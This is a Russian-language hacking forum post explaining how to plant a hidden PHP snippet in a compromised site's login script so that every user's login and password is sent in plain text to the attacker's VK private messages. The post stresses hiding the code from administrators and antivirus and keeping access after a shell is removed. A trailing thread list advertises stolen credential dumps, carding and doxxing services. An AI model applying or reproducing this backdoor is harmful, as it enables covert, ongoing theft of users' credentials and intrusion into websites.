Сбор login:pass с сайтов без дешифровки БД с всегда актуальными данными

M

MrFear41

Original poster
Сижу я тут, и меня осенило, что можно сливать логины и пароли со взломанных сайтов без расшифровки паролей(пусть они в БД хоть как будут запаролены :) ).
При этом даже если ваш шелл удалят, вы все равно сможете получать актуальные пароли(даже если их будут менять каждую минуту), в том числе и новорегов!
Заинтригованы?
Ну, погнали!

Что нам нужно:
- фейковый акк в вк (хоть пустой, пофиг). А лучше два.
- Небольшое знание PHP
- Все :)

Итак, вот мы взломали сайт, залили шелл, но БД весит несколько ГБ, да и шифр хрен знает какой, и вообще нет желания разбираться с этим. И тут вы подумали, что админ шелл может найти и удалить, а доступ к логинам и паролям терять не хочется. В том числе и к новорегам.

Тут нам поможет наш VK. Мы допишем немного форму авторизации, чтобы логины и пароли прилетали к нам в личные сообщения, как только кто-то авторизовывается.
В чем плюсы способа?
- эту доработку не спалит ни один WEB антивирус(AI-BOLIT допустим)
- в большом коде сложно заметить этот кусок
- у нас на руках всегда актуальные данные

Короче, хватит болтовни!
Приступаем!

Заходим на свой фейк, переходим по этой

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Даем доступ, сверху в адресной строке копируем наш Access_token

Теперь ищем на сайте PHP файл, отвечающий за вывод формы авторизации (бывает в index.php или в login.php чаще всего, но может быть и в других местах)

Теперь берем код, который я написал ниже и вставляем его куда нибудь в тело скрипта авторизации, в то место, где много кода (чтобы не так выделялось)

Код:
$text = "$Log:$Pass";

$token = '';

$post = file_get_contents ('https://api.vk.com/method/messages....='.urlencode($text).'&access_token='.$token); 
(т.к. форум автоматически линкует ссылки, жмите тут ПКМ и копировать ссылку, ну и вставьте ее хоть в блокнот)
В переменную $token = ''; в кавычки вставляем наш токен от фейковой страницы

В строке:
$post = file_get_contents ('

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Меняем 12345 на ID вашей страницы в вк, на которую будут приходить пароли(обязательно циферный!)

Теперь самое сложное!
Нужно найти в коде сайта 2 переменные, которые хранят логин и пароль.
Допустим на сайте логин хранится в переменной $logauth а пароль в $passauth

Тогда нам нужно наш код ( $text = "$Log:$Pass"; )
Изменить на $text = "$logauth:$passauth";
Все, сохраняем и пробуем авторизоваться на сайте. Данные пришли? Великолепно! Значит вы все сделали правильно!
Ну, а для знающих PHP дополнить код, если конечно им нужно, они смогут сами!
А для незнающих этого более чем достаточно, чтобы получать всегда логины и пароли в чистом виде!

С вами был как обычно MrFear41. Ставьте "мне нравится" если вам понравиалсь моя статья!
 
Название темы
Автор Заголовок Раздел Ответы Дата
GetLeads [Вконтакте +] Массовые рассылки в ЛС/В сообщения группам. Сбор аудитории без доплат Ищу работу. Предлагаю свои услуги. 5
H Мануал по Maltego. Сбор информации Корзина 0
DOMINUS Проверено «EDEM PROBIV» Пробьём всё! Сбор досье и пробив информации по государственным службам (МВД, ФМС, ФНС, ГИБДД, ПФР, Росреестр, ЗАГС, Интерпол и др.) Пробив информации/Прозвоны 2
S Сбор MAC-адресов устройств. Подскажите у кого какие идеи есть. WiFi/Wardriving/Bluejacking 0
G Python для хакера - Часть 3. Сбор информации об IP и пробиваем номер сотового. Другие ЯП 1
Little_Prince Сбор информации Анонимность и приватность 3
S Автоматический бот для поиска ваших запросов с логов [url:login:password] Все что не подошло по разделу 0
B Закрыто 306 000 000 строк Url;Login:Password - Найду все что хотите Корзина 1
K MIX Login pass DB pornhub.com 2k Раздача email 0
F valid mails login Раздача email 1
АнАлЬнАя ЧуПаКаБрА LOGIN:PASS [Private Keeper] Облачный майнинг (с капчей) Проекты Private Keeper 0
NickelBlack [STEAM] [BruteForce|Checker] [BEST] [NO ANTIGATE] [LOGIN:PWD] Проекты Private Keeper 0
sdx Game 360k login:pass Раздача email 0
attilla Zabugor Login:Pass Games rus 380к 2019 Раздача email 0
W Закрыто [ HQ/MQ BASE ] - [ USA | EURO | RU | LOGIN:PASS ] [ Любая Выборка по Стране и Домену ] Корзина 7
АнАлЬнАя ЧуПаКаБрА Zabugor (Login:pass) Антипаблик 600млн Раздача email 4
M ZB 200k строк [чистый валид ] ( [email protected] ) Раздача email 1
АнАлЬнАя ЧуПаКаБрА INLINE Partypoker REG [Login;Password] Проекты Private Keeper 0
F Закрыто Big AP Mails|Phone|Login низкая цена за такой вес Корзина 2
B [Login:Pass] база под Steam Раздача email 0
R ICQ: 748449993 Sell TRANSFER WU/PAYPAL/DUMPS Track 1&2/SELL CVV/BANK LOGIN Корзина 0
АнАлЬнАя ЧуПаКаБрА INLINE [BC] Точилка MAIL:PASS => LOGIN:PASS Проекты Private Keeper 0
BuriTTo Fake login page hydra Софт от наших юзеров 2
АнАлЬнАя ЧуПаКаБрА INLINE mail=login Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE email:pass , login:pass дрочка на бит Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Из mail:pass в login:pass BTC, btchype тематики Проекты Private Keeper 2
АнАлЬнАя ЧуПаКаБрА INLINE Для создания базы login:pass из Email:pass (ru) Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Doubledice Брут/Чекер [Login:Pass] Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА Blockchain Login Finder (20!8) Софт для работы с текстом/Другой софт 0
H MIX MIX Login:Pass Раздача email 2
N MIX FULL VALID GOOD MIXED COMBO MAIL PASS FACEBOOK INSTAGRAM TWITTER LINKEDIN TINDER Раздача email 0
semsvm MIX 500k-Mix.txt x7-mail:pass Раздача email 0
N Zabugor 700K MAIL PASS CZ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №149 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №148 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №147 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №146 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №142 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №139 | ║$ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №138 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №125 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №124 | ║$║ Раздача email 0
Pazesz СКУПКА СВЕЖЫХ MAIL:PASS ДАМПОВ - BUYING FRESH MAIL:PASS DUMPS Ищу работу. Предлагаю свои услуги. 1
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №112 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №111 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №108 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №107 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №105 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №104 | ║$║ Раздача email 0
M Valid 300k HOTMAIL & OUTLOOK BASE ║$║ MAIL:PASS ║$║ February 2024 №103 | ║$║ Раздача email 0

Название темы